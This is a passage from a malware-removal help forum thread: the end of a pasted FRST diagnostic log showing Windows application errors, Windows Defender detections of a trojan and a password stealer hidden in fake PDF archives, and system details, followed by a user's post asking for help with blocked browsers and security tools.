ntdll.dll, version: 6.3.9600.18969, time stamp: 0x5aa29ff0 Exception code: 0xc0000005 Fault offset: 0x000000000003de0e Faulting process id: 0x1810 Faulting application start time: 0x01d4c296d845137b Faulting application path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Faulting module path: C:\Windows\SYSTEM32\ntdll.dll Report Id: 30c70117-2e8a-11e9-8274-402cf4d8539a Faulting package full name: Faulting package-relative application ID: Error: (02/12/2019 06:51:07 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: chrome.exe, version: 71.0.3578.98, time stamp: 0x5c0f4450 Faulting module name: ntdll.dll, version: 6.3.9600.18969, time stamp: 0x5aa29ff0 Exception code: 0xc0000005 Fault offset: 0x000000000003de0e Faulting process id: 0x1810 Faulting application start time: 0x01d4c296d845137b Faulting application path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Faulting module path: C:\Windows\SYSTEM32\ntdll.dll Report Id: 3067a1aa-2e8a-11e9-8274-402cf4d8539a Faulting package full name: Faulting package-relative application ID: Error: (02/12/2019 06:50:26 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: chrome.exe, version: 71.0.3578.98, time stamp: 0x5c0f4450 Faulting module name: WINHTTP.dll, version: 0.0.0.0, time stamp: 0x5be6862f Exception code: 0xc0000005 Fault offset: 0x0000000000003d68 Faulting process id: 0x1810 Faulting application start time: 0x01d4c296d845137b Faulting application path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Faulting module path: C:\Program Files (x86)\Google\Chrome\Application\WINHTTP.dll Report Id: 17d7ce98-2e8a-11e9-8274-402cf4d8539a Faulting package full name: Faulting package-relative application ID: Error: (02/12/2019 06:42:05 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: License Activation (slui.exe) failed with the following error code: hr=0x8007007B Command-line arguments: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable Error: (02/12/2019 06:42:00 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: License Activation (slui.exe) failed with the following error code: hr=0x8007007B Command-line arguments: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=UserLogon;SessionId=1 Error: (02/12/2019 05:47:25 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: License Activation (slui.exe) failed with the following error code: hr=0x8007007B Command-line arguments: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=UserLogon;SessionId=4 Error: (02/12/2019 05:45:57 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: License Activation (slui.exe) failed with the following error code: hr=0x8007007B Command-line arguments: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=UserLogon;SessionId=3 System errors: ============= Error: (02/12/2019 06:41:29 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Iskysoft Application Framework Service service hung on starting. Error: (02/12/2019 06:38:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Apple Mobile Device Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service. Error: (02/12/2019 06:38:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Windows Media Player Network Sharing Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service. Error: (02/12/2019 06:38:27 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The Iskysoft Application Framework Service service terminated unexpectedly. It has done this 1 time(s). Error: (02/12/2019 06:38:25 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Windows Presentation Foundation Font Cache 3.0.0.0 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 0 milliseconds: Restart the service. Error: (02/12/2019 06:38:25 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The BlackBerry Link Communication Manager service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service. Error: (02/12/2019 06:38:25 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The iPod Service service terminated unexpectedly. It has done this 1 time(s). Error: (02/12/2019 06:38:25 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The BlackBerry Device Manager service terminated unexpectedly. It has done this 1 time(s). Windows Defender: =================================== Date: 2018-06-08 02:08:10.472 Description: Windows Defender has detected malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0 Name: Trojan:Win32/Fuerboos.C!cl ID: 2147723654 Severity: Severe Category: Trojan Path: containerfile:_C:\Users\Stanley\Desktop\AUDIT FOR 052018.PDF.ace;containerfile:_C:\Users\Stanley\Desktop\Research Table N5900GH.pdf.ace;file:_C:\Users\Stanley\Desktop\AUDIT FOR 052018.PDF.ace->AUDIT FOR 052018.PDF.exe;file:_C:\Users\Stanley\Desktop\Research Table N5900GH.pdf.ace->Research Table N5900GH.pdf.exe Detection Origin: Local machine Detection Type: FastPath Detection Source: System Process Name: Unknown Signature Version: AV: 1.269.584.0, AS: 1.269.584.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.14901.4, NIS: 0.0.0.0 Date: 2018-06-08 02:01:10.450 Description: Windows Defender has detected malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0 Name: Trojan:Win32/Fuerboos.C!cl ID: 2147723654 Severity: Severe Category: Trojan Path: file:_C:\Users\Stanley\Desktop\AUDIT FOR 052018.PDF.exe;file:_C:\Users\Stanley\Desktop\Research Table N5900GH.pdf.exe Detection Origin: Local machine Detection Type: FastPath Detection Source: System Process Name: Unknown Signature Version: AV: 1.269.584.0, AS: 1.269.584.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.14901.4, NIS: 0.0.0.0 Date: 2018-06-08 01:23:11.676 Description: Windows Defender scan has been stopped before completion. Scan ID: {E75703DA-D253-4DDC-842F-2B0F9A3792FD} Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2018-06-07 17:31:42.439 Description: Windows Defender scan has been stopped before completion. Scan ID: {C77FBF52-7AF1-4C53-85F1-8C8D18BF5A75} Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2018-06-07 17:18:05.871 Description: Windows Defender scan has been stopped before completion. Scan ID: {06CD7F49-9CF6-446A-B793-6848E5293BA3} Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2018-05-29 09:02:21.940 Description: Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0 Name: PWS:Win32/Dyzap.X ID: 2147717189 Severity: Severe Category: Password Stealer Path: process:_pid:5952,ProcessStart:131720254146746317 Detection Origin: Unknown Detection Type: Concrete Detection Source: System Process Name: C:\Users\Stanley\AppData\Local\Temp\~AceTemp\APPROVED_DOCUMENTS_2018_PDF\APPROVED DOCUMENTS 2018_PDF.exe Action: Quarantine Action Status: To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. To finish removing malware and other potentially unwanted software, restart the computer. Error Code: 0x8007054f Error description: An internal error occurred. Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0 Date: 2018-05-16 13:56:59.426 Description: Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0 Name: PWS:Win32/Dyzap.X ID: 2147717189 Severity: Severe Category: Password Stealer Path: process:_pid:4316,ProcessStart:131708507062533276 Detection Origin: Unknown Detection Type: Concrete Detection Source: System Process Name: C:\Users\Stanley\AppData\Local\Temp\~AceTemp\Invoice890667\log.exe Action: Quarantine Action Status: To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. To finish removing malware and other potentially unwanted software, restart the computer. Error Code: 0x8007054f Error description: An internal error occurred. Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0 Date: 2018-05-11 11:10:10.550 Description: Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0 Name: PWS:Win32/Dyzap.X ID: 2147717189 Severity: Severe Category: Password Stealer Path: process:_pid:1280,ProcessStart:131703753193678578 Detection Origin: Unknown Detection Type: Concrete Detection Source: System Process Name: C:\Users\Stanley\AppData\Local\Temp\Rar$EXa0.300\RTY_RFQ_GT_USD-FOQ_MoQ.exe Action: Quarantine Action Status: To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. To finish removing malware and other potentially unwanted software, restart the computer. Error Code: 0x8007054f Error description: An internal error occurred. Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0 Date: 2018-05-09 14:16:37.521 Description: Windows Defender has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.267.831.0 Update Source: Microsoft Update Server Signature Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.14800.3 Error code: 0x80240016 Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. Date: 2018-05-09 14:16:37.521 Description: Windows Defender has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.267.831.0 Update Source: Microsoft Update Server Signature Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.14800.3 Error code: 0x80240016 Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. CodeIntegrity: =================================== Date: 2018-12-23 07:19:51.102 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2018-12-23 07:19:49.365 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2018-12-23 07:19:47.582 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2018-12-23 07:19:45.686 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-2540M CPU @ 2.60GHz Percentage of memory in use: 67% Total physical RAM: 4006.35 MB Available physical RAM: 1296.44 MB Total Virtual: 8102.35 MB Available Virtual: 5425.77 MB ==================== Drives ================================ Drive 😄 () (Fixed) (Total:297.75 GB) (Free:64.73 GB) NTFS \\?\Volume{4756afb4-4eee-11e8-824f-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.09 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 2DDE751F) Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=297.7 GB) - (Type=07 NTFS) ==================== End of Addition.txt ============================
  12. Good day, of recent after restarting my pc, i noticed i cannot open my chrome browsers, i started getting lots of ads pop up from my Internet explorer even when it's closed. I usually use malwarebytes to scan my pc, but unfortunately it refuses to open, i keep getting this error message "windows cannot access the specific device, path, or file. You maynot have the appropriate permissions to access the item." Also when i try opening the windows defender. After fruitless efforts to solve it i came across this forum. I downloaded the malwarebytes as instructed and still get same error response. I have done the scan with FRST and attached are the addtion.txt and frst.txt respectively. Addition.txt FRST.txt
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.